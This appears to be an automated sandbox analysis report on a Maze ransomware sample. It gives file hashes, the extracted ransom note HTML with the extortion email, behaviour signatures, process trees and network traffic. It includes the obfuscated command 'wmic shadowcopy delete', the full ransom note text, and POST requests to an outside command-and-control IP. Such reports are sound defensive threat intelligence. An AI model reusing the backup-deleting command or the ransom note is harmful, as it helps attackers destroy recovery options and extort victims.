Resubmissions

11/06/2024, 09:53 UTC

240611-lwmnaaseqh 10

11/06/2024, 09:47 UTC

240611-lsfesssdqh 10

Analysis

  • max time kernel
    954s
  • max time network
    962s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags
    arch:x64
    arch:x86
    image:win10v2004-20240226-en
    locale:en-us
    os:windows10-2004-x64
    system
  • submitted
    11/06/2024, 09:53 UTC

General

  • Target

    1.exe

  • Size

    447KB

  • MD5

    9823800f063a1d4ee7a749961db7540f

  • SHA1

    9d2917a668b30ba9f6b3e7a3316553791eb1c052

  • SHA256

    a9524de985a3ecc43e11dd7c051a4bbfe08c3d71cde98ea9bb6ea7f32c0cb174

  • SHA512

    c48624e32dba7f08ce0ca8267e541b123c6a9bf848b81d9e62f7fc4bec9b8ed801a6204ffaece4decf0d31bf2595867ff6f8c0b176e366848b61145cc585e41e

  • SSDEEP

    12288:Yn+KS3UINuBGCz0SxWUNmH2o8PXwU9Eq7zKloxTwRtjauqCXy3X:Y+FUKWAHNqXwUlzD9w7PqCin

Malware Config

Extracted

Path

F:\DECRYPT-FILES.html

Ransom Note
<html> <head> <script> function CopyToClipboard(containerid) { if (document.selection) { var range = document.body.createTextRange(); range.moveToElementText(document.getElementById(containerid)); range.select().createTextRange(); document.execCommand("copy"); } else if (window.getSelection) { var range = document.createRange(); range.selectNode(document.getElementById(containerid)); window.getSelection().addRange(range); document.execCommand("copy"); alert("Base64 copied into the clipboard!") } } </script> <style> html{ margin:0; padding:0; width:100%; height:100%; } body { background: #000080; color: #ececec; font-family: Consolas }; .tooltip { position: relative; display: inline-block; border-bottom: 1px dotted black; } .tooltip .tooltiptext { visibility: hidden; width: 120px; background-color: #555; color: #fff; text-align: center; border-radius: 6px; padding: 5px 0; position: absolute; z-index: 1; bottom: 125%; left: 50%; margin-left: -60px; opacity: 0; transition: opacity 0.3s; } .tooltip .tooltiptext::after { content: ""; position: absolute; top: 100%; left: 50%; margin-left: -5px; border-width: 5px; border-style: solid; border-color: #555 transparent transparent transparent; } .tooltip:hover .tooltiptext { visibility: visible; opacity: 1; } p#base64{ -ms-word-break: break-all; word-break: break-all; -webkit-hyphens: auto; -moz-hyphens: auto; -ms-hyphens: auto; hyphens: auto; } p#base64:hover{ cursor: hand; } </style> </head> <body> <table style="position: absolute;" width="100%"> <tr> <td style="width: 25%;"> <span class="left" style="font-size: 14px; font-weight: bold">CODE: <br>------ <br>00000&nbsp;00000 <br>00000&nbsp;00000 <br>00000&nbsp;00000 <br>00000&nbsp;00000 <br>00000&nbsp;00000 <br>00000&nbsp;00000 <br>00000&nbsp;00000 <br>00000&nbsp;00000 </span> </td> <td style="width: 50%;"> <div style="text-align: center; font-size: 20px;"> <p><s>0010 SYSTEM FAILURE 0010</s></p> 
<p>*********************************************************************************************************************</p> <p>Attention! Your documents, photos, databases, and other important files have been encrypted!</p> <p>*********************************************************************************************************************</p> <br> </div> <div style="text-align: center; font-size: 18px;"> <p>The only way to decrypt your files, is to buy the private key from us.</p> <p>You can decrypt one of your files for free, as a proof that we have the method to decrypt the rest of your data.</p> <p>In order to receive the private key contact us via email: <br> <b>decryptmaze@airmail.cc</b> </p> <p>Remember to hurry up, as your email address may not be avaliable for very long.<br>Buying the key immediatly will guarantee that 100% of your files will be restored.</p> <p>Below you will see a big base64 blob, you will need to email us and copy this blob to us.<br>you can click on it, and it will be copied into the clipboard.</p> <p>If you have troubles copying it, just send us the file you are currently reading, as an attachment.</p> <br> <p>Base64: </p> </div><div style="text-align: center; font-size: 12px;"><p id="base64" onclick="return CopyToClipboard('base64')" class="tooltip">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<span class="tooltiptext">Click here to copy</span></p></div></td><td style="width: 25%; text-align: right;"><span class="right" style="font-size: 14px; font-weight: bold">IMMINENT SHUTDOWN:<br>------<br>00000&nbsp;00000&nbsp;0&nbsp;00<br>00000&nbsp;00000&nbsp;0&nbsp;00<br>00000&nbsp;00000&nbsp;0&nbsp;00<br>00000&nbsp;00000&nbsp;0&nbsp;00<br>00000&nbsp;00000&nbsp;0&nbsp;00<br>00000&nbsp;00000&nbsp;0&nbsp;00<br>00000&nbsp;00000&nbsp;0&nbsp;00<br>00000&nbsp;00000&nbsp;0&nbsp;00</span></td></tr></table></body></html>
Emails

decryptmaze@airmail.cc

Signatures

  • Maze

    Ransomware family also known as ChaCha.

  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Drops startup file 4 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Program crash 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\1.exe
    "C:\Users\Admin\AppData\Local\Temp\1.exe"
    1⤵
    • Drops startup file
    • Sets desktop wallpaper using registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:392
    • C:\Windows\system32\wbem\wmic.exe
      "C:\ris\..\Windows\c\bbe\c\..\..\..\system32\i\..\wbem\by\gv\iy\..\..\..\wmic.exe" shadowcopy delete
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3212
    • C:\Windows\system32\wbem\wmic.exe
      "C:\pjoig\bjf\ndrvr\..\..\..\Windows\v\..\system32\txh\..\wbem\vu\cjonf\ihdqv\..\..\..\wmic.exe" shadowcopy delete
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1384
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 392 -s 2396
      2⤵
      • Program crash
      PID:700
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:4712
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1340 --field-trial-handle=2236,i,5367110156796017614,12594004256180761011,262144 --variations-seed-version /prefetch:8
    1⤵
      PID:4472
    • C:\Windows\system32\AUDIODG.EXE
      C:\Windows\system32\AUDIODG.EXE 0x470 0x4f8
      1⤵
        PID:60
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 392 -ip 392
        1⤵
          PID:2272
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4152 --field-trial-handle=2236,i,5367110156796017614,12594004256180761011,262144 --variations-seed-version /prefetch:8
          1⤵
            PID:3436

          Network

          • flag-us
            DNS
            183.142.211.20.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            183.142.211.20.in-addr.arpa
            IN PTR
            Response
          • flag-us
            DNS
            81.144.22.2.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            81.144.22.2.in-addr.arpa
            IN PTR
            Response
            81.144.22.2.in-addr.arpa
            IN PTR
            a2-22-144-81deploystaticakamaitechnologiescom
          • flag-us
            DNS
            22.160.190.20.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            22.160.190.20.in-addr.arpa
            IN PTR
            Response
          • flag-us
            DNS
            95.221.229.192.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            95.221.229.192.in-addr.arpa
            IN PTR
            Response
          • flag-us
            DNS
            217.106.137.52.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            217.106.137.52.in-addr.arpa
            IN PTR
            Response
          • flag-us
            DNS
            241.150.49.20.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            241.150.49.20.in-addr.arpa
            IN PTR
            Response
          • flag-us
            DNS
            171.39.242.20.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            171.39.242.20.in-addr.arpa
            IN PTR
            Response
          • flag-us
            DNS
            157.123.68.40.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            157.123.68.40.in-addr.arpa
            IN PTR
            Response
          • flag-us
            DNS
            73.144.22.2.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            73.144.22.2.in-addr.arpa
            IN PTR
            Response
            73.144.22.2.in-addr.arpa
            IN PTR
            a2-22-144-73deploystaticakamaitechnologiescom
          • flag-ru
            POST
            http://92.63.194.20/create/suhrhoclq.shtml?ps=pgvasc&air=w0wlqu&eeh=r1l0eap70&nyf=7
            1.exe
            Remote address:
            92.63.194.20:80
            Request
            POST /create/suhrhoclq.shtml?ps=pgvasc&air=w0wlqu&eeh=r1l0eap70&nyf=7 HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko
            Host: 92.63.194.20
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 259
            Connection: Keep-Alive
          • flag-ru
            POST
            http://92.63.194.20/create/suhrhoclq.shtml?ps=pgvasc&air=w0wlqu&eeh=r1l0eap70&nyf=7
            1.exe
            Remote address:
            92.63.194.20:80
            Request
            POST /create/suhrhoclq.shtml?ps=pgvasc&air=w0wlqu&eeh=r1l0eap70&nyf=7 HTTP/1.1
            Content-Type: application/x-www-form-urlencoded
            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko
            Host: 92.63.194.20
            Content-Length: 259
            Cache-Control: no-cache
            Response
            HTTP/1.1 500 Internal Server Error
            Server: nginx
            Date: Tue, 11 Jun 2024 09:55:10 GMT
            Content-Type: text/html; charset=iso-8859-1
            Content-Length: 594
            Connection: keep-alive
          • flag-us
            DNS
            20.194.63.92.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            20.194.63.92.in-addr.arpa
            IN PTR
            Response
            20.194.63.92.in-addr.arpa
            IN PTR
            vlan442dci
          • flag-us
            DNS
            23.173.189.20.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            23.173.189.20.in-addr.arpa
            IN PTR
            Response
          • flag-us
            DNS
            chromewebstore.googleapis.com
            Remote address:
            8.8.8.8:53
            Request
            chromewebstore.googleapis.com
            IN A
            Response
            chromewebstore.googleapis.com
            IN A
            172.217.16.234
            chromewebstore.googleapis.com
            IN A
            142.250.200.10
            chromewebstore.googleapis.com
            IN A
            142.250.200.42
            chromewebstore.googleapis.com
            IN A
            216.58.201.106
            chromewebstore.googleapis.com
            IN A
            216.58.204.74
            chromewebstore.googleapis.com
            IN A
            216.58.212.202
            chromewebstore.googleapis.com
            IN A
            216.58.212.234
            chromewebstore.googleapis.com
            IN A
            142.250.179.234
            chromewebstore.googleapis.com
            IN A
            142.250.180.10
            chromewebstore.googleapis.com
            IN A
            142.250.187.202
            chromewebstore.googleapis.com
            IN A
            142.250.187.234
            chromewebstore.googleapis.com
            IN A
            142.250.178.10
          • flag-us
            DNS
            chromewebstore.googleapis.com
            Remote address:
            8.8.8.8:53
            Request
            chromewebstore.googleapis.com
            IN Unknown
            Response
          • flag-us
            DNS
            234.16.217.172.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            234.16.217.172.in-addr.arpa
            IN PTR
            Response
            234.16.217.172.in-addr.arpa
            IN PTR
            lhr48s28-in-f101e100net
            234.16.217.172.in-addr.arpa
            IN PTR
            mad08s04-in-f10�I
          • 20.231.121.79:80
            46 B
            1
          • 92.63.8.47:80
            1.exe
            260 B
            5
          • 13.107.246.64:443
            46 B
            40 B
            1
            1
          • 92.63.8.47:80
            1.exe
            260 B
            5
          • 92.63.32.2:80
            1.exe
            260 B
            200 B
            5
            5
          • 92.63.32.2:80
            1.exe
            260 B
            200 B
            5
            5
          • 92.63.37.100:80
            1.exe
            260 B
            5
          • 92.63.37.100:80
            1.exe
            260 B
            5
          • 92.63.194.20:80
            http://92.63.194.20/create/suhrhoclq.shtml?ps=pgvasc&air=w0wlqu&eeh=r1l0eap70&nyf=7
            http
            1.exe
            771 B
            132 B
            5
            3

            HTTP Request

            POST http://92.63.194.20/create/suhrhoclq.shtml?ps=pgvasc&air=w0wlqu&eeh=r1l0eap70&nyf=7
          • 92.63.194.20:80
            http://92.63.194.20/create/suhrhoclq.shtml?ps=pgvasc&air=w0wlqu&eeh=r1l0eap70&nyf=7
            http
            1.exe
            772 B
            906 B
            5
            3

            HTTP Request

            POST http://92.63.194.20/create/suhrhoclq.shtml?ps=pgvasc&air=w0wlqu&eeh=r1l0eap70&nyf=7

            HTTP Response

            500
          • 92.63.17.245:80
            1.exe
            260 B
            5
          • 92.63.8.47:80
            1.exe
            260 B
            5
          • 92.63.17.245:80
            1.exe
            260 B
            5
          • 92.63.8.47:80
            1.exe
            260 B
            5
          • 92.63.32.55:80
            1.exe
            260 B
            5
          • 92.63.32.2:80
            1.exe
            52 B
            40 B
            1
            1
          • 172.217.16.234:443
            chromewebstore.googleapis.com
            tls
            2.2kB
            8.3kB
            22
            23
          • 8.8.8.8:53
            183.142.211.20.in-addr.arpa
            dns
            73 B
            159 B
            1
            1

            DNS Request

            183.142.211.20.in-addr.arpa

          • 8.8.8.8:53
            81.144.22.2.in-addr.arpa
            dns
            70 B
            133 B
            1
            1

            DNS Request

            81.144.22.2.in-addr.arpa

          • 8.8.8.8:53
            22.160.190.20.in-addr.arpa
            dns
            72 B
            158 B
            1
            1

            DNS Request

            22.160.190.20.in-addr.arpa

          • 8.8.8.8:53
            95.221.229.192.in-addr.arpa
            dns
            73 B
            144 B
            1
            1

            DNS Request

            95.221.229.192.in-addr.arpa

          • 8.8.8.8:53
            217.106.137.52.in-addr.arpa
            dns
            73 B
            147 B
            1
            1

            DNS Request

            217.106.137.52.in-addr.arpa

          • 8.8.8.8:53
            241.150.49.20.in-addr.arpa
            dns
            72 B
            158 B
            1
            1

            DNS Request

            241.150.49.20.in-addr.arpa

          • 8.8.8.8:53
            tls
            72 B
            158 B
            1
            1
          • 8.8.8.8:53
            171.39.242.20.in-addr.arpa
            dns
            72 B
            158 B
            1
            1

            DNS Request

            171.39.242.20.in-addr.arpa

          • 8.8.8.8:53
            157.123.68.40.in-addr.arpa
            dns
            72 B
            146 B
            1
            1

            DNS Request

            157.123.68.40.in-addr.arpa

          • 8.8.8.8:53
            73.144.22.2.in-addr.arpa
            dns
            70 B
            133 B
            1
            1

            DNS Request

            73.144.22.2.in-addr.arpa

          • 8.8.8.8:53
            20.194.63.92.in-addr.arpa
            dns
            71 B
            96 B
            1
            1

            DNS Request

            20.194.63.92.in-addr.arpa

          • 8.8.8.8:53
            23.173.189.20.in-addr.arpa
            dns
            72 B
            158 B
            1
            1

            DNS Request

            23.173.189.20.in-addr.arpa

          • 8.8.8.8:53
            chromewebstore.googleapis.com
            dns
            75 B
            267 B
            1
            1

            DNS Request

            chromewebstore.googleapis.com

            DNS Response

            172.217.16.234
            142.250.200.10
            142.250.200.42
            216.58.201.106
            216.58.204.74
            216.58.212.202
            216.58.212.234
            142.250.179.234
            142.250.180.10
            142.250.187.202
            142.250.187.234
            142.250.178.10

          • 8.8.8.8:53
            chromewebstore.googleapis.com
            dns
            75 B
            132 B
            1
            1

            DNS Request

            chromewebstore.googleapis.com

          • 8.8.8.8:53
            234.16.217.172.in-addr.arpa
            dns
            73 B
            142 B
            1
            1

            DNS Request

            234.16.217.172.in-addr.arpa

          MITRE ATT&CK Enterprise v15

          Downloads

          • F:\DECRYPT-FILES.html

            Filesize

            6KB

            MD5

            348ccf8f265db9d6588c37f06f89a5dc

            SHA1

            8518e635cc4aaaeec1db342c29be880cd19154e5

            SHA256

            11a769eb18e3bc89df0778031f47c8b6efa0aa656d2d3a36d4f519afc408f3e8

            SHA512

            eb10ee4e9efa6ef36db3f293ac336b4b22f9d6a786ff0ed310b10a930b3f672834731290f542373d12272e6dcd8b3c3f5a47892d8a0b1e2c4f09180c179fe433

          • memory/392-0-0x0000000000D30000-0x0000000000D89000-memory.dmp

            Filesize

            356KB

          • memory/392-1-0x0000000001110000-0x000000000116A000-memory.dmp

            Filesize

            360KB

          • memory/392-5-0x0000000001110000-0x000000000116A000-memory.dmp

            Filesize

            360KB

          • memory/392-9-0x0000000001110000-0x000000000116A000-memory.dmp

            Filesize

            360KB

          • memory/392-13-0x0000000001110000-0x000000000116A000-memory.dmp

            Filesize

            360KB

          • memory/392-5218-0x0000000001110000-0x000000000116A000-memory.dmp

            Filesize

            360KB
